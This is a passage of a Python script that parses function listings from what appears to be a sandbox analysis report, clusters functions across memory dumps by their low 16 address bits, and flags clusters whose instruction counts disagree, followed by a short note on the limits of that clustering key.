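    """'libraryloaderCOMMON' -> ('library', 'loader', 'COMMON')."""
    tags, rest = [], blob
    while rest:
        hit = next((t for t in KNOWN_TAGS if rest.startswith(t)), None)
        if hit is None:            # unknown tag: keep the remainder verbatim, do not guess
            tags.append(rest)
            break
        tags.append(hit)
        rest = rest[len(hit):]
    return tuple(tags)


@dataclass(frozen=True)
class Func:
    dump: str          # label of the listing the line came from
    executed: bool     # True if listed under "Executed Functions"
    addr: int
    relevance: float
    apis: int
    strings: int
    instructions: int
    tags: tuple


def parse_listing(dump, executed, text):
    """Parse every function summary line in text; any other line is ignored."""
    out = []
    for m in filter(None, map(LINE_RE.search, text.splitlines())):
        out.append(Func(dump, executed, int(m["addr"], 16), float(m["rel"]),
                        int(m["apis"] or 0), int(m["strings"] or 0),
                        int(m["instr"]), split_tags(m["tags"])))
    return out


def cluster_by_offset(funcs):
    """Group functions whose low 16 address bits agree: same code, different base."""
    clusters = defaultdict(list)
    for f in funcs:
        clusters[f.addr & 0xFFFF].append(f)
    return dict(clusters)


def summarize(clusters):
    """Per cluster: where it was seen, where it ran, and whether the bodies agree."""
    rows = []
    for low16, members in sorted(clusters.items()):
        rows.append({
            "low16": low16,
            "addresses": sorted(f"{f.addr:X}" for f in members),
            "dumps": sorted({f.dump for f in members}),
            "executed_in": sorted({f.dump for f in members if f.executed}),
            # more than one count here means a different build, or a low-16 collision
            "instruction_counts": sorted({f.instructions for f in members}),
            "tags": sorted({t for f in members for t in f.tags})})
    return rows


# Sample input: lines copied from the report's tables; the dump labels are invented.
REPORT = {
    ("dump A", False): """
Function 00007FFD696A9D9D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 227pipetimeCOMMON""",
    ("dump B", True): """
Function 005D02A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
Function 005C3A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON""",
    ("dump C", False): """
Function 00007FFD69649D9D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 227pipetimeCOMMON""",
    ("dump D", True): """
Function 004602A4, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 542COMMONCrypto
Function 0045A8E0, Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 609registryCOMMONCrypto
Function 00453A22, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63synchronizationCOMMON""",
    ("dump E", True): """
Function 00A16537, Relevance: 22.1, APIs: 2, Strings: 10, Instructions: 1095networkCOMMONCrypto
Function 00A202A4, Relevance: 16.3, APIs: 2, Strings: 7, Instructions: 543COMMONCrypto""",
}


def load_report(report=REPORT):
    return [f for (dump, ex), txt in report.items() for f in parse_listing(dump, ex, txt)]


if __name__ == "__main__":
    for row in summarize(cluster_by_offset(load_report())):
        print(f"{row['low16']:04X} seen in {row['dumps']} ran in {row['executed_in']} "
              f"instr={row['instruction_counts']} tags={row['tags']}")
```

The low-16 key is deliberately loose: two unrelated functions can share it, and a function that differs between builds (the xx02A4 function is listed with 542 instructions in some dumps and 543 in others) still lands in one cluster. The instruction_counts field surfaces both cases, so a cluster with more than one count is the one to look at by hand rather than trust.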